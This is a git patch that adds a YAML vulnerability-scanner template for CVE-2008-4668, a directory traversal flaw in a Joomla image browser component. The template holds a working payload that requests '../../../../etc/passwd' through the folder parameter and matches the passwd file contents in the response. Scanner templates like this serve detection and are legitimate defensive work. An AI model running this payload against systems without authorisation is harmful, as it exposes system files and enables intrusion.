From 5d5adbfea89e7c9424584a835e0aee28dac4b8b4 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 13 Aug 2021 06:20:38 +0700 Subject: [PATCH] Create CVE-2008-4668.yaml --- cves/2008/CVE-2008-4668.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2008/CVE-2008-4668.yaml diff --git a/cves/2008/CVE-2008-4668.yaml b/cves/2008/CVE-2008-4668.yaml new file mode 100644 index 0000000000..86cdf1bca8 --- /dev/null +++ b/cves/2008/CVE-2008-4668.yaml @@ -0,0 +1,27 @@ +id: CVE-2008-4668 + +info: + name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/6618 + - https://www.cvedetails.com/cve/CVE-2008-4668 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200